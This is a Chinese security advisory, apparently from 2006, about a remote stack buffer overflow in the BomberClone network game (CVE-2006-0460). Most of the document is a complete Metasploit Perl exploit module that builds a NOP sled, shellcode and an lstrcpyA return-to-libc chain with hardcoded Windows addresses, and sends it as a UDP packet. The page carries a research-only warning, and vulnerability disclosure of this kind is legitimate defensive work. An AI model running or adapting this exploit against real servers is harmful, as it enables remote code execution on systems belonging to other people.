安全研究
安全漏洞
BomberClone错误消息处理远程缓冲区溢出漏洞
发布日期:2006-02-18
更新日期:2006-02-18
受影响系统:
BomberClone BomberClone 0.9.x描述:
BomberClone BomberClone 0.11.6.2
BomberClone BomberClone 0.11.6
BomberClone BomberClone 0.11.5
BomberClone BomberClone 0.11.2
BomberClone BomberClone 0.11.1
BomberClone BomberClone 0.11.0
BomberClone BomberClone 0.10.x
BUGTRAQ ID: 16697
CVE(CAN) ID: CVE-2006-0460
BomberClone是一款多人的网络游戏。
BomberClone处理用户游戏操作的报文时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
BomberClone处理游戏报文时存在一个典型的栈缓冲区溢出漏洞,攻击者可以通过发送超长的某种类型的请求触发漏洞。
<*来源:Stefan Cornelius
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::bomberclone_overflow_win32;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Bomberclone 0.11.6 Buffer Overflow',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'Jacopo Cervini <acaro [at] jervus.it>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 11000],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 344,
'BadChars' => "\x00",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.
The return address is overwritten with lstrcpyA memory address,
the second and third value are the destination buffer,
the fourth value is the source address of our buffer in the stack.
This exploit is like a return in libc.
ATTENTION
The shellcode is exec ONLY when someone try to close bomberclone.
}),
'Refs' =>
[
['OSVDB', '23263'],
['BID', '16697'],
['URL', 'http://www.frsirt.com/english/advisories/2006/0643'],
],
'Targets' =>
[
['Windows XP SP2 Italian', 0x7c80c729 ], #lstrcpyA address in kernel32.dll
['Windows 2000 SP1 English', 0x77e85f08 ], #lstrcpyA address in kernel32.dll
['Windows 2000 SP0 Italian', 0x77e95e8b ], #lstrcpyA address in kernel32.dll
],
'Keys' => ['bomberclone'],
'DisclosureDate' => 'Feb 16 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
if (! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the nop module.");
return;
}
my $nop = $self->MakeNops(421);
my $pattern = $nop ;
$pattern .= $shellcode;
$pattern .= pack('V', $target->[1]);
$pattern .= "\x04\xec\xfd\x7f"x2;
$pattern .= "\xa4\xfa\x22\x00"; # our buffer in the stack it is always there
my $request = "\x00\x00\x00\x00\x38\x03\x41" . $pattern . "\r\n";
$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using lstrcpyA address at 0x%.8x...", $target->[1]));
my $s = Msf::Socket::Udp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$s->Send($request);
$s->Recv(-1, 10);
$s->Close();
return;
}
建议:
厂商补丁:
BomberClone
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.bomberclone.de/
浏览次数:2569
严重程度:0(网友投票)
绿盟科技给您安全的保障